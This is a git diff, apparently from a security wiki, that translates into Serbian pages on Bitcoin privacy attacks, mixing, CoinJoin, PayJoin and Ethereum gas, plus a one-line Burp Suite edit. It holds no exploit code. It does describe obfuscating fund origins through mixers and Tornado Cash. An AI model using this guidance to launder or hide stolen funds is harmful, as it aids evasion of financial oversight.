+- **Tačni Iznosi Plaćanja:** Transakcije bez promene su verovatno između dve adrese koje poseduje isti korisnik.
+- **Celi Brojevi:** Celi broj u transakciji sugeriše da je to plaćanje, pri čemu je ne-celi izlaz verovatno promena.
+- **Otisak Novčanika:** Različiti novčanici imaju jedinstvene obrasce kreiranja transakcija, što omogućava analitičarima da identifikuju korišćen softver i potencijalno adresu promene.
+- **Korelacije Iznosa i Vremena:** Otkriće vremena ili iznosa transakcija može učiniti transakcije tragovima.
 
-- **Exact Payment Amounts:** Transactions without change are likely between two addresses owned by the same user.
-- **Round Numbers:** A round number in a transaction suggests it's a payment, with the non-round output likely being the change.
-- **Wallet Fingerprinting:** Different wallets have unique transaction creation patterns, allowing analysts to identify the software used and potentially the change address.
-- **Amount & Timing Correlations:** Disclosing transaction times or amounts can make transactions traceable.
+## **Analiza Saobraćaja**
 
-## **Traffic Analysis**
+Praćenjem mrežnog saobraćaja, napadači mogu potencijalno povezati transakcije ili blokove sa IP adresama, ugrožavajući privatnost korisnika. Ovo je posebno tačno ako entitet upravlja mnogim Bitcoin čvorovima, što poboljšava njihovu sposobnost praćenja transakcija.
 
-By monitoring network traffic, attackers can potentially link transactions or blocks to IP addresses, compromising user privacy. This is especially true if an entity operates many Bitcoin nodes, enhancing their ability to monitor transactions.
+## Više
 
-## More
+Za sveobuhvatan spisak napada na privatnost i odbrana, posetite [Bitcoin Privacy on Bitcoin Wiki](https://en.bitcoin.it/wiki/Privacy).
 
-For a comprehensive list of privacy attacks and defenses, visit [Bitcoin Privacy on Bitcoin Wiki](https://en.bitcoin.it/wiki/Privacy).
+# Anonimne Bitcoin Transakcije
 
-# Anonymous Bitcoin Transactions
+## Načini za Sticanje Bitcoina Anonimno
 
-## Ways to Get Bitcoins Anonymously
+- **Transakcije Gotovinom**: Sticanje bitcoina putem gotovine.
+- **Alternativne Gotovine**: Kupovina poklon kartica i njihova razmena online za bitcoin.
+- **Rudarenje**: Najprivatnija metoda za zarađivanje bitcoina je kroz rudarenje, posebno kada se radi samostalno, jer rudarske grupe mogu znati IP adresu rudara. [Informacije o Rudarskim Grupama](https://en.bitcoin.it/wiki/Pooled_mining)
+- **Krađa**: Teoretski, krađa bitcoina bi mogla biti još jedan način za njegovo anonimno sticanje, iako je to ilegalno i nije preporučljivo.
 
-- **Cash Transactions**: Acquiring bitcoin through cash.
-- **Cash Alternatives**: Purchasing gift cards and exchanging them online for bitcoin.
-- **Mining**: The most private method to earn bitcoins is through mining, especially when done alone because mining pools may know the miner's IP address. [Mining Pools Information](https://en.bitcoin.it/wiki/Pooled_mining)
-- **Theft**: Theoretically, stealing bitcoin could be another method to acquire it anonymously, although it's illegal and not recommended.
+## Servisi za Mešanje
 
-## Mixing Services
-
-By using a mixing service, a user can **send bitcoins** and receive **different bitcoins in return**, which makes tracing the original owner difficult. Yet, this requires trust in the service not to keep logs and to actually return the bitcoins. Alternative mixing options include Bitcoin casinos.
+Korišćenjem servisa za mešanje, korisnik može **poslati bitcoine** i primiti **različite bitcoine u zamenu**, što otežava praćenje originalnog vlasnika. Ipak, ovo zahteva poverenje u servis da ne čuva evidenciju i da zaista vrati bitcoine. Alternativne opcije mešanja uključuju Bitcoin kockarnice.
 
 ## CoinJoin
 
-**CoinJoin** merges multiple transactions from different users into one, complicating the process for anyone trying to match inputs with outputs. Despite its effectiveness, transactions with unique input and output sizes can still potentially be traced.
+**CoinJoin** spaja više transakcija od različitih korisnika u jednu, komplikujući proces za svakoga ko pokušava da uskladi ulaze sa izlazima. I pored svoje efikasnosti, transakcije sa jedinstvenim ulaznim i izlaznim veličinama i dalje se mogu potencijalno pratiti.
 
-Example transactions that may have used CoinJoin include `402d3e1df685d1fdf82f36b220079c1bf44db227df2d676625ebcbee3f6cb22a` and `85378815f6ee170aa8c26694ee2df42b99cff7fa9357f073c1192fff1f540238`.
+Primeri transakcija koje su možda koristile CoinJoin uključuju `402d3e1df685d1fdf82f36b220079c1bf44db227df2d676625ebcbee3f6cb22a` i `85378815f6ee170aa8c26694ee2df42b99cff7fa9357f073c1192fff1f540238`.
 
-For more information, visit [CoinJoin](https://coinjoin.io/en). For a similar service on Ethereum, check out [Tornado Cash](https://tornado.cash), which anonymizes transactions with funds from miners.
+Za više informacija, posetite [CoinJoin](https://coinjoin.io/en). Za sličnu uslugu na Ethereum-u, pogledajte [Tornado Cash](https://tornado.cash), koja anonimizuje transakcije sa sredstvima od rudara.
 
 ## PayJoin
 
-A variant of CoinJoin, **PayJoin** (or P2EP), disguises the transaction among two parties (e.g., a customer and a merchant) as a regular transaction, without the distinctive equal outputs characteristic of CoinJoin. This makes it extremely hard to detect and could invalidate the common-input-ownership heuristic used by transaction surveillance entities.
-
+Varijanta CoinJoin, **PayJoin** (ili P2EP), prikriva transakciju između dve strane (npr. kupca i trgovca) kao redovnu transakciju, bez karakterističnih jednakih izlaza koji su karakteristični za CoinJoin. Ovo čini izuzetno teškim otkrivanje i moglo bi da poništi heuristiku zajedničkog vlasništva ulaza koju koriste entiteti za nadzor transakcija.
 ```plaintext
 2 btc --> 3 btc
 5 btc     4 btc
 ```
+Transakcije poput gornjih mogu biti PayJoin, poboljšavajući privatnost dok ostaju neprepoznatljive od standardnih bitcoin transakcija.
 
-Transactions like the above could be PayJoin, enhancing privacy while remaining indistinguishable from standard bitcoin transactions.
+**Korišćenje PayJoin-a može značajno ometati tradicionalne metode nadzora**, čineći ga obećavajućim razvojem u potrazi za transakcionom privatnošću.
 
-**The utilization of PayJoin could significantly disrupt traditional surveillance methods**, making it a promising development in the pursuit of transactional privacy.
+# Najbolje prakse za privatnost u kriptovalutama
 
-# Best Practices for Privacy in Cryptocurrencies
+## **Tehnike sinhronizacije novčanika**
 
-## **Wallet Synchronization Techniques**
+Da bi se održala privatnost i sigurnost, sinhronizacija novčanika sa blockchain-om je ključna. Dve metode se ističu:
 
-To maintain privacy and security, synchronizing wallets with the blockchain is crucial. Two methods stand out:
+- **Puni čvor**: Preuzimanjem celog blockchain-a, puni čvor osigurava maksimalnu privatnost. Sve transakcije ikada izvršene se čuvaju lokalno, što onemogućava protivnicima da identifikuju koje transakcije ili adrese korisnik zanima.
+- **Filtriranje blokova na klijentskoj strani**: Ova metoda uključuje kreiranje filtera za svaki blok u blockchain-u, omogućavajući novčanicima da identifikuju relevantne transakcije bez izlaganja specifičnih interesa posmatračima mreže. Laki novčanici preuzimaju ove filtere, preuzimajući pune blokove samo kada se pronađe podudaranje sa adresama korisnika.
 
-- **Full node**: By downloading the entire blockchain, a full node ensures maximum privacy. All transactions ever made are stored locally, making it impossible for adversaries to identify which transactions or addresses the user is interested in.
-- **Client-side block filtering**: This method involves creating filters for every block in the blockchain, allowing wallets to identify relevant transactions without exposing specific interests to network observers. Lightweight wallets download these filters, only fetching full blocks when a match with the user's addresses is found.
+## **Korišćenje Tora za anonimnost**
 
-## **Utilizing Tor for Anonymity**
+S obzirom na to da Bitcoin funkcioniše na peer-to-peer mreži, preporučuje se korišćenje Tora za maskiranje vaše IP adrese, poboljšavajući privatnost prilikom interakcije sa mrežom.
 
-Given that Bitcoin operates on a peer-to-peer network, using Tor is recommended to mask your IP address, enhancing privacy when interacting with the network.
+## **Prevencija ponovne upotrebe adresa**
 
-## **Preventing Address Reuse**
+Da bi se zaštitila privatnost, važno je koristiti novu adresu za svaku transakciju. Ponovna upotreba adresa može kompromitovati privatnost povezivanjem transakcija sa istim entitetom. Moderni novčanici obeshrabruju ponovnu upotrebu adresa kroz svoj dizajn.
 
-To safeguard privacy, it's vital to use a new address for every transaction. Reusing addresses can compromise privacy by linking transactions to the same entity. Modern wallets discourage address reuse through their design.
+## **Strategije za privatnost transakcija**
 
-## **Strategies for Transaction Privacy**
+- **Više transakcija**: Deljenje uplate na nekoliko transakcija može zamagliti iznos transakcije, ometajući napade na privatnost.
+- **Izbegavanje promena**: Odabir transakcija koje ne zahtevaju promene poboljšava privatnost ometajući metode detekcije promena.
+- **Više izlaza za promenu**: Ako izbegavanje promene nije izvodljivo, generisanje više izlaza za promenu može i dalje poboljšati privatnost.
 
-- **Multiple transactions**: Splitting a payment into several transactions can obscure the transaction amount, thwarting privacy attacks.
-- **Change avoidance**: Opting for transactions that don't require change outputs enhances privacy by disrupting change detection methods.
-- **Multiple change outputs**: If avoiding change isn't feasible, generating multiple change outputs can still improve privacy.
+# **Monero: Svetionik anonimnosti**
 
-# **Monero: A Beacon of Anonymity**
+Monero odgovara na potrebu za apsolutnom anonimnošću u digitalnim transakcijama, postavljajući visoke standarde za privatnost.
 
-Monero addresses the need for absolute anonymity in digital transactions, setting a high standard for privacy.
+# **Ethereum: Gas i transakcije**
 
-# **Ethereum: Gas and Transactions**
+## **Razumevanje gasa**
 
-## **Understanding Gas**
+Gas meri računski napor potreban za izvršavanje operacija na Ethereum-u, a cena je u **gwei**. Na primer, transakcija koja košta 2,310,000 gwei (ili 0.00231 ETH) uključuje gas limit i osnovnu naknadu, uz napojnicu za podsticanje rudara. Korisnici mogu postaviti maksimalnu naknadu kako bi osigurali da ne preplate, a višak se vraća.
 
-Gas measures the computational effort needed to execute operations on Ethereum, priced in **gwei**. For example, a transaction costing 2,310,000 gwei (or 0.00231 ETH) involves a gas limit and a base fee, with a tip to incentivize miners. Users can set a max fee to ensure they don't overpay, with the excess refunded.
+## **Izvršavanje transakcija**
 
-## **Executing Transactions**
+Transakcije u Ethereum-u uključuju pošiljaoca i primaoca, koji mogu biti adrese korisnika ili pametnih ugovora. One zahtevaju naknadu i moraju biti rudarene. Osnovne informacije u transakciji uključuju primaoca, potpis pošiljaoca, vrednost, opcione podatke, gas limit i naknade. Značajno je da se adresa pošiljaoca deducira iz potpisa, eliminišući potrebu za njom u podacima transakcije.
 
-Transactions in Ethereum involve a sender and a recipient, which can be either user or smart contract addresses. They require a fee and must be mined. Essential information in a transaction includes the recipient, sender's signature, value, optional data, gas limit, and fees. Notably, the sender's address is deduced from the signature, eliminating the need for it in the transaction data.
+Ove prakse i mehanizmi su osnovni za svakoga ko želi da se angažuje sa kriptovalutama dok prioritet daje privatnosti i sigurnosti.
 
-These practices and mechanisms are foundational for anyone looking to engage with cryptocurrencies while prioritizing privacy and security.
-
-## References
+## Reference
 
 - [https://en.wikipedia.org/wiki/Proof_of_stake](https://en.wikipedia.org/wiki/Proof_of_stake)
 - [https://www.mycryptopedia.com/public-key-private-key-explained/](https://www.mycryptopedia.com/public-key-private-key-explained/)
diff --git a/src/burp-suite.md b/src/burp-suite.md
index 680a21a9e..31ef832f0 100644
--- a/src/burp-suite.md
+++ b/src/burp-suite.md
@@ -4,7 +4,7 @@
 
 - **Jednostavna lista:** Samo lista koja sadrži jedan unos u svakoj liniji
 - **Runtime fajl:** Lista koja se čita u runtime-u (nije učitana u memoriju). Za podršku velikim listama.
-- **Izmena slučaja:** Primeni neke promene na listu stringova (Bez promene, na mala slova, na VELIKA slova, na Prvo slovo - Prvo veliko slovo, a ostala mala-, na Prvo ime - Prvo veliko slovo, a ostalo ostaje isto-).
+- **Izmena slučaja:** Primeni neke promene na listu stringova (Bez promene, na mala slova, na VELIKA slova, na pravilno ime - Prvo veliko slovo i ostalo na mala slova, na Pravilno ime - Prvo veliko slovo, a ostalo ostaje isto).
 - **Brojevi:** Generiši brojeve od X do Y koristeći Z korak ili nasumično.
 - **Brute Forcer:** Skup karaktera, minimalna i maksimalna dužina.
 
diff --git a/src/crypto-and-stego/blockchain-and-crypto-currencies.md b/src/crypto-and-stego/blockchain-and-crypto-currencies.md
index 71b79f58f..46fd5b59a 100644
--- a/src/crypto-and-stego/blockchain-and-crypto-currencies.md
+++ b/src/crypto-and-stego/blockchain-and-crypto-currencies.md
@@ -1,180 +1,176 @@
 {{#include ../banners/hacktricks-training.md}}
 
-## Basic Concepts
+## Osnovni Koncepti
 
-- **Smart Contracts** are defined as programs that execute on a blockchain when certain conditions are met, automating agreement executions without intermediaries.
-- **Decentralized Applications (dApps)** build upon smart contracts, featuring a user-friendly front-end and a transparent, auditable back-end.
-- **Tokens & Coins** differentiate where coins serve as digital money, while tokens represent value or ownership in specific contexts.
-  - **Utility Tokens** grant access to services, and **Security Tokens** signify asset ownership.
-- **DeFi** stands for Decentralized Finance, offering financial services without central authorities.
-- **DEX** and **DAOs** refer to Decentralized Exchange Platforms and Decentralized Autonomous Organizations, respectively.
+- **Pametni Ugovori** definišu se kao programi koji se izvršavaju na blockchain-u kada su ispunjeni određeni uslovi, automatizujući izvršenja ugovora bez posrednika.
+- **Decentralizovane Aplikacije (dApps)** se oslanjaju na pametne ugovore, imajući korisnički prijatan front-end i transparentan, auditable back-end.
+- **Tokeni i Kovanice** se razlikuju gde kovanice služe kao digitalni novac, dok tokeni predstavljaju vrednost ili vlasništvo u specifičnim kontekstima.
+- **Utility Tokeni** omogućavaju pristup uslugama, a **Security Tokeni** označavaju vlasništvo nad imovinom.
+- **DeFi** označava Decentralizovane Finansije, nudeći finansijske usluge bez centralnih vlasti.
+- **DEX** i **DAO** se odnose na Decentralizovane Berzanske Platforme i Decentralizovane Autonomne Organizacije, redom.
 
-## Consensus Mechanisms
+## Mehanizmi Konsenzusa
 
-Consensus mechanisms ensure secure and agreed transaction validations on the blockchain:
+Mehanizmi konsenzusa osiguravaju sigurne i dogovorene validacije transakcija na blockchain-u:
 
-- **Proof of Work (PoW)** relies on computational power for transaction verification.
-- **Proof of Stake (PoS)** demands validators to hold a certain amount of tokens, reducing energy consumption compared to PoW.
+- **Proof of Work (PoW)** se oslanja na računarsku snagu za verifikaciju transakcija.
+- **Proof of Stake (PoS)** zahteva od validatora da drže određenu količinu tokena, smanjujući potrošnju energije u poređenju sa PoW.
 
-## Bitcoin Essentials
+## Osnovne Informacije o Bitcoinu
 
-### Transactions
+### Transakcije
 
-Bitcoin transactions involve transferring funds between addresses. Transactions are validated through digital signatures, ensuring only the owner of the private key can initiate transfers.
+Bitcoin transakcije uključuju prebacivanje sredstava između adresa. Transakcije se validiraju putem digitalnih potpisa, osiguravajući da samo vlasnik privatnog ključa može inicirati transfere.
 
-#### Key Components:
+#### Ključne Komponente:
 
-- **Multisignature Transactions** require multiple signatures to authorize a transaction.
-- Transactions consist of **inputs** (source of funds), **outputs** (destination), **fees** (paid to miners), and **scripts** (transaction rules).
+- **Multisignature Transakcije** zahtevaju više potpisa za autorizaciju transakcije.
+- Transakcije se sastoje od **ulaza** (izvor sredstava), **izlaza** (odredište), **naknada** (plaćene rudarima) i **skripti** (pravila transakcije).
 
 ### Lightning Network
 
-Aims to enhance Bitcoin's scalability by allowing multiple transactions within a channel, only broadcasting the final state to the blockchain.
+Cilj je poboljšati skalabilnost Bitcoina omogućavajući više transakcija unutar kanala, samo emitovanjem konačnog stanja na blockchain.
 
-## Bitcoin Privacy Concerns
+## Problemi Privatnosti Bitcoina
 
-Privacy attacks, such as **Common Input Ownership** and **UTXO Change Address Detection**, exploit transaction patterns. Strategies like **Mixers** and **CoinJoin** improve anonymity by obscuring transaction links between users.
+Napadi na privatnost, kao što su **Common Input Ownership** i **UTXO Change Address Detection**, koriste obrasce transakcija. Strategije poput **Mixers** i **CoinJoin** poboljšavaju anonimnost prikrivanjem veza između transakcija korisnika.
 
-## Acquiring Bitcoins Anonymously
+## Sticanje Bitcoina Anonimno
 
-Methods include cash trades, mining, and using mixers. **CoinJoin** mixes multiple transactions to complicate traceability, while **PayJoin** disguises CoinJoins as regular transactions for heightened privacy.
+Metode uključuju gotovinske trgovine, rudarenje i korišćenje miksera. **CoinJoin** meša više transakcija kako bi otežao praćenje, dok **PayJoin** prikriva CoinJoins kao obične transakcije za povećanu privatnost.
 
-# Bitcoin Privacy Atacks
+# Napadi na Privatnost Bitcoina
 
-# Summary of Bitcoin Privacy Attacks
+# Sažetak Napada na Privatnost Bitcoina
 
-In the world of Bitcoin, the privacy of transactions and the anonymity of users are often subjects of concern. Here's a simplified overview of several common methods through which attackers can compromise Bitcoin privacy.
+U svetu Bitcoina, privatnost transakcija i anonimnost korisnika često su predmet zabrinutosti. Evo pojednostavljenog pregleda nekoliko uobičajenih metoda kroz koje napadači mogu kompromitovati privatnost Bitcoina.
 
-## **Common Input Ownership Assumption**
+## **Pretpostavka Zajedničkog Vlasništva Ulaza**
 
-It is generally rare for inputs from different users to be combined in a single transaction due to the complexity involved. Thus, **two input addresses in the same transaction are often assumed to belong to the same owner**.
+Generalno je retko da se ulazi različitih korisnika kombinuju u jednoj transakciji zbog složenosti koja je uključena. Tako se **dve adrese ulaza u istoj transakciji često pretpostavljaju da pripadaju istom vlasniku**.
 
-## **UTXO Change Address Detection**
+## **UTXO Adresa Promene Detekcija**
 
-A UTXO, or **Unspent Transaction Output**, must be entirely spent in a transaction. If only a part of it is sent to another address, the remainder goes to a new change address. Observers can assume this new address belongs to the sender, compromising privacy.
+UTXO, ili **Unspent Transaction Output**, mora biti potpuno potrošen u transakciji. Ako se samo deo pošalje na drugu adresu, ostatak ide na novu adresu promene. Posmatrači mogu pretpostaviti da ova nova adresa pripada pošiljaocu, kompromitujući privatnost.
 
-### Example
+### Primer
 
-To mitigate this, mixing services or using multiple addresses can help obscure ownership.
+Da bi se to ublažilo, usluge mešanja ili korišćenje više adresa mogu pomoći u prikrivanju vlasništva.
 
-## **Social Networks & Forums Exposure**
+## **Izloženost Društvenih Mreža i Foruma**
 
-Users sometimes share their Bitcoin addresses online, making it **easy to link the address to its owner**.
+Korisnici ponekad dele svoje Bitcoin adrese na mreži, što olakšava **povezivanje adrese sa njenim vlasnikom**.
 
-## **Transaction Graph Analysis**
+## **Analiza Transakcionih Grafova**
 
-Transactions can be visualized as graphs, revealing potential connections between users based on the flow of funds.
+Transakcije se mogu vizualizovati kao grafovi, otkrivajući potencijalne veze između korisnika na osnovu toka sredstava.
 
-## **Unnecessary Input Heuristic (Optimal Change Heuristic)**
+## **Heuristika Nepotrebnog Ulaza (Optimalna Heuristika Promene)**
 
-This heuristic is based on analyzing transactions with multiple inputs and outputs to guess which output is the change returning to the sender.
-
-### Example
+Ova heuristika se zasniva na analizi transakcija sa više ulaza i izlaza kako bi se pogodilo koji izlaz je promena koja se vraća pošiljaocu.
 
+### Primer
 ```bash
 2 btc --> 4 btc
 3 btc     1 btc
 ```
+Ako dodavanje više ulaza čini izlaz veći od bilo kog pojedinačnog ulaza, to može zbuniti heuristiku.
 
-If adding more inputs makes the change output larger than any single input, it can confuse the heuristic.
+## **Prisilna Ponovna Upotreba Adresa**
 
-## **Forced Address Reuse**
+Napadači mogu slati male iznose na prethodno korišćene adrese, nadajući se da će primalac kombinovati ove sa drugim ulazima u budućim transakcijama, čime se povezuju adrese.
 
-Attackers may send small amounts to previously used addresses, hoping the recipient combines these with other inputs in future transactions, thereby linking addresses together.
+### Ispravno Ponašanje Novčanika
 
-### Correct Wallet Behavior
+Novčanici bi trebali izbegavati korišćenje kovanica primljenih na već korišćenim, praznim adresama kako bi se sprečilo ovo curenje privatnosti.
 
-Wallets should avoid using coins received on already used, empty addresses to prevent this privacy leak.
+## **Druge Tehnike Analize Blockchain-a**
 
-## **Other Blockchain Analysis Techniques**
+- **Tačni Iznosi Plaćanja:** Transakcije bez kusura su verovatno između dve adrese koje poseduje isti korisnik.
+- **Celi Brojevi:** Celi broj u transakciji sugeriše da je to plaćanje, pri čemu je ne-celi izlaz verovatno kusur.
+- **Otisak Novčanika:** Različiti novčanici imaju jedinstvene obrasce kreiranja transakcija, što omogućava analitičarima da identifikuju korišćen softver i potencijalno adresu kusura.
+- **Korelacije Iznosa i Vremena:** Otkriće vremena ili iznosa transakcija može učiniti transakcije tragovima.
 
-- **Exact Payment Amounts:** Transactions without change are likely between two addresses owned by the same user.
-- **Round Numbers:** A round number in a transaction suggests it's a payment, with the non-round output likely being the change.
-- **Wallet Fingerprinting:** Different wallets have unique transaction creation patterns, allowing analysts to identify the software used and potentially the change address.
-- **Amount & Timing Correlations:** Disclosing transaction times or amounts can make transactions traceable.
+## **Analiza Saobraćaja**
 
-## **Traffic Analysis**
+Praćenjem mrežnog saobraćaja, napadači mogu potencijalno povezati transakcije ili blokove sa IP adresama, ugrožavajući privatnost korisnika. Ovo je posebno tačno ako entitet upravlja mnogim Bitcoin čvorovima, što poboljšava njihovu sposobnost praćenja transakcija.
 
-By monitoring network traffic, attackers can potentially link transactions or blocks to IP addresses, compromising user privacy. This is especially true if an entity operates many Bitcoin nodes, enhancing their ability to monitor transactions.
+## Više
 
-## More
+Za sveobuhvatan spisak napada na privatnost i odbrana, posetite [Bitcoin Privacy on Bitcoin Wiki](https://en.bitcoin.it/wiki/Privacy).
 
-For a comprehensive list of privacy attacks and defenses, visit [Bitcoin Privacy on Bitcoin Wiki](https://en.bitcoin.it/wiki/Privacy).
+# Anonimne Bitcoin Transakcije
 
-# Anonymous Bitcoin Transactions
+## Načini za Sticanje Bitcoina Anonimno
 
-## Ways to Get Bitcoins Anonymously
+- **Transakcije Gotovinom**: Sticanje bitcoina putem gotovine.
+- **Alternativa Gotovini**: Kupovina poklon kartica i njihova razmena online za bitcoin.
+- **Rudarenje**: Najprivatnija metoda za zarađivanje bitcoina je kroz rudarenje, posebno kada se radi samostalno, jer rudarske grupe mogu znati IP adresu rudara. [Informacije o Rudarskim Grupama](https://en.bitcoin.it/wiki/Pooled_mining)
+- **Krađa**: Teoretski, krađa bitcoina bi mogla biti još jedna metoda za sticanje anonimno, iako je to ilegalno i ne preporučuje se.
 
-- **Cash Transactions**: Acquiring bitcoin through cash.
-- **Cash Alternatives**: Purchasing gift cards and exchanging them online for bitcoin.
-- **Mining**: The most private method to earn bitcoins is through mining, especially when done alone because mining pools may know the miner's IP address. [Mining Pools Information](https://en.bitcoin.it/wiki/Pooled_mining)
-- **Theft**: Theoretically, stealing bitcoin could be another method to acquire it anonymously, although it's illegal and not recommended.
+## Servisi za Mešanje
 
-## Mixing Services
-
-By using a mixing service, a user can **send bitcoins** and receive **different bitcoins in return**, which makes tracing the original owner difficult. Yet, this requires trust in the service not to keep logs and to actually return the bitcoins. Alternative mixing options include Bitcoin casinos.
+Korišćenjem servisa za mešanje, korisnik može **poslati bitcoine** i primiti **različite bitcoine u zamenu**, što otežava praćenje originalnog vlasnika. Ipak, ovo zahteva poverenje u servis da ne čuva evidenciju i da zaista vrati bitcoine. Alternativne opcije mešanja uključuju Bitcoin kockarnice.
 
 ## CoinJoin
 
-**CoinJoin** merges multiple transactions from different users into one, complicating the process for anyone trying to match inputs with outputs. Despite its effectiveness, transactions with unique input and output sizes can still potentially be traced.
+**CoinJoin** spaja više transakcija od različitih korisnika u jednu, komplikujući proces za svakoga ko pokušava da uskladi ulaze sa izlazima. I pored svoje efikasnosti, transakcije sa jedinstvenim ulaznim i izlaznim veličinama i dalje se potencijalno mogu pratiti.
 
-Example transactions that may have used CoinJoin include `402d3e1df685d1fdf82f36b220079c1bf44db227df2d676625ebcbee3f6cb22a` and `85378815f6ee170aa8c26694ee2df42b99cff7fa9357f073c1192fff1f540238`.
+Primeri transakcija koje su možda koristile CoinJoin uključuju `402d3e1df685d1fdf82f36b220079c1bf44db227df2d676625ebcbee3f6cb22a` i `85378815f6ee170aa8c26694ee2df42b99cff7fa9357f073c1192fff1f540238`.
 
-For more information, visit [CoinJoin](https://coinjoin.io/en). For a similar service on Ethereum, check out [Tornado Cash](https://tornado.cash), which anonymizes transactions with funds from miners.
+Za više informacija, posetite [CoinJoin](https://coinjoin.io/en). Za sličnu uslugu na Ethereum-u, pogledajte [Tornado Cash](https://tornado.cash), koja anonimizuje transakcije sa sredstvima od rudara.
 
 ## PayJoin
 
-A variant of CoinJoin, **PayJoin** (or P2EP), disguises the transaction among two parties (e.g., a customer and a merchant) as a regular transaction, without the distinctive equal outputs characteristic of CoinJoin. This makes it extremely hard to detect and could invalidate the common-input-ownership heuristic used by transaction surveillance entities.
-
+Varijanta CoinJoin-a, **PayJoin** (ili P2EP), prikriva transakciju između dve strane (npr. kupca i trgovca) kao redovnu transakciju, bez karakterističnih jednakih izlaza koji su karakteristični za CoinJoin. Ovo čini izuzetno teškim otkrivanje i moglo bi da poništi heuristiku zajedničkog vlasništva ulaza koju koriste entiteti za nadzor transakcija.
 ```plaintext
 2 btc --> 3 btc
 5 btc     4 btc
 ```
+Transakcije poput gornjih mogle bi biti PayJoin, poboljšavajući privatnost dok ostaju neprepoznatljive od standardnih bitcoin transakcija.
 
-Transactions like the above could be PayJoin, enhancing privacy while remaining indistinguishable from standard bitcoin transactions.
+**Korišćenje PayJoin moglo bi značajno ometati tradicionalne metode nadzora**, čineći ga obećavajućim razvojem u potrazi za transakcionom privatnošću.
 
-**The utilization of PayJoin could significantly disrupt traditional surveillance methods**, making it a promising development in the pursuit of transactional privacy.
+# Najbolje prakse za privatnost u kriptovalutama
 
-# Best Practices for Privacy in Cryptocurrencies
+## **Tehnike sinhronizacije novčanika**
 
-## **Wallet Synchronization Techniques**
+Da bi se održala privatnost i sigurnost, sinhronizacija novčanika sa blockchain-om je ključna. Dve metode se ističu:
 
-To maintain privacy and security, synchronizing wallets with the blockchain is crucial. Two methods stand out:
+- **Puni čvor**: Preuzimanjem celog blockchain-a, puni čvor osigurava maksimalnu privatnost. Sve transakcije ikada izvršene se čuvaju lokalno, što onemogućava protivnicima da identifikuju koje transakcije ili adrese korisnik zanima.
+- **Filtriranje blokova na klijentskoj strani**: Ova metoda uključuje kreiranje filtera za svaki blok u blockchain-u, omogućavajući novčanicima da identifikuju relevantne transakcije bez izlaganja specifičnih interesa posmatračima mreže. Laki novčanici preuzimaju ove filtere, preuzimajući pune blokove samo kada se pronađe podudaranje sa adresama korisnika.
 
-- **Full node**: By downloading the entire blockchain, a full node ensures maximum privacy. All transactions ever made are stored locally, making it impossible for adversaries to identify which transactions or addresses the user is interested in.
-- **Client-side block filtering**: This method involves creating filters for every block in the blockchain, allowing wallets to identify relevant transactions without exposing specific interests to network observers. Lightweight wallets download these filters, only fetching full blocks when a match with the user's addresses is found.
+## **Korišćenje Tora za anonimnost**
 
-## **Utilizing Tor for Anonymity**
+S obzirom na to da Bitcoin funkcioniše na peer-to-peer mreži, preporučuje se korišćenje Tora za maskiranje vaše IP adrese, poboljšavajući privatnost prilikom interakcije sa mrežom.
 
-Given that Bitcoin operates on a peer-to-peer network, using Tor is recommended to mask your IP address, enhancing privacy when interacting with the network.
+## **Sprečavanje ponovne upotrebe adresa**
 
-## **Preventing Address Reuse**
+Da bi se zaštitila privatnost, važno je koristiti novu adresu za svaku transakciju. Ponovna upotreba adresa može kompromitovati privatnost povezivanjem transakcija sa istim entitetom. Moderni novčanici obeshrabruju ponovnu upotrebu adresa kroz svoj dizajn.
 
-To safeguard privacy, it's vital to use a new address for every transaction. Reusing addresses can compromise privacy by linking transactions to the same entity. Modern wallets discourage address reuse through their design.
+## **Strategije za privatnost transakcija**
 
-## **Strategies for Transaction Privacy**
+- **Više transakcija**: Deljenje uplate na nekoliko transakcija može zamagliti iznos transakcije, ometajući napade na privatnost.
+- **Izbegavanje promena**: Odabir transakcija koje ne zahtevaju promene poboljšava privatnost ometajući metode detekcije promena.
+- **Više izlaza za promenu**: Ako izbegavanje promene nije izvodljivo, generisanje više izlaza za promenu može i dalje poboljšati privatnost.
 
-- **Multiple transactions**: Splitting a payment into several transactions can obscure the transaction amount, thwarting privacy attacks.
-- **Change avoidance**: Opting for transactions that don't require change outputs enhances privacy by disrupting change detection methods.
-- **Multiple change outputs**: If avoiding change isn't feasible, generating multiple change outputs can still improve privacy.
+# **Monero: Svetionik anonimnosti**
 
-# **Monero: A Beacon of Anonymity**
+Monero se bavi potrebom za apsolutnom anonimnošću u digitalnim transakcijama, postavljajući visoke standarde za privatnost.
 
-Monero addresses the need for absolute anonymity in digital transactions, setting a high standard for privacy.
+# **Ethereum: Gas i transakcije**
 
-# **Ethereum: Gas and Transactions**
+## **Razumevanje gasa**
 
-## **Understanding Gas**
+Gas meri računski napor potreban za izvršavanje operacija na Ethereum-u, a cena je u **gwei**. Na primer, transakcija koja košta 2,310,000 gwei (ili 0.00231 ETH) uključuje gas limit i osnovnu naknadu, uz napojnicu za podsticanje rudara. Korisnici mogu postaviti maksimalnu naknadu kako bi osigurali da ne preplate, a višak se vraća.
 
-Gas measures the computational effort needed to execute operations on Ethereum, priced in **gwei**. For example, a transaction costing 2,310,000 gwei (or 0.00231 ETH) involves a gas limit and a base fee, with a tip to incentivize miners. Users can set a max fee to ensure they don't overpay, with the excess refunded.
+## **Izvršavanje transakcija**
 
-## **Executing Transactions**
+Transakcije na Ethereum-u uključuju pošiljaoca i primaoca, koji mogu biti adrese korisnika ili pametnih ugovora. One zahtevaju naknadu i moraju biti rudarenje. Osnovne informacije u transakciji uključuju primaoca, potpis pošiljaoca, vrednost, opcione podatke, gas limit i naknade. Značajno je da se adresa pošiljaoca deducira iz potpisa, eliminišući potrebu za njom u podacima transakcije.
 
-Transactions in Ethereum involve a sender and a recipient, which can be either user or smart contract addresses. They require a fee and must be mined. Essential information in a transaction includes the recipient, sender's signature, value, optional data, gas limit, and fees. Notably, the sender's address is deduced from the signature, eliminating the need for it in the transaction data.
+Ove prakse i mehanizmi su osnovni za svakoga ko želi da se bavi kriptovalutama dok prioritet daje privatnosti i sigurnosti.
 
-These practices and mechanisms are foundational for anyone looking to engage with cryptocurrencies while prioritizing privacy and security.
-
-## References
+## Reference
 
 - [https://en.wikipedia.org/wiki/Proof_of_stake](https://en.wikipedia.org/wiki/Proof_of_stake)
 - [https://www.mycryptopedia.com/public-key-private-key-explained/](https://www.mycryptopedia.com/public-key-private-key-explained/)
diff --git a/src/crypto-and-stego/certificates.md b/src/crypto-and-stego/certificates.md
index d0c4ad006..ea9c2747c 100644
--- a/src/crypto-and-stego/certificates.md
+++ b/src/crypto-and-stego/certificates.md
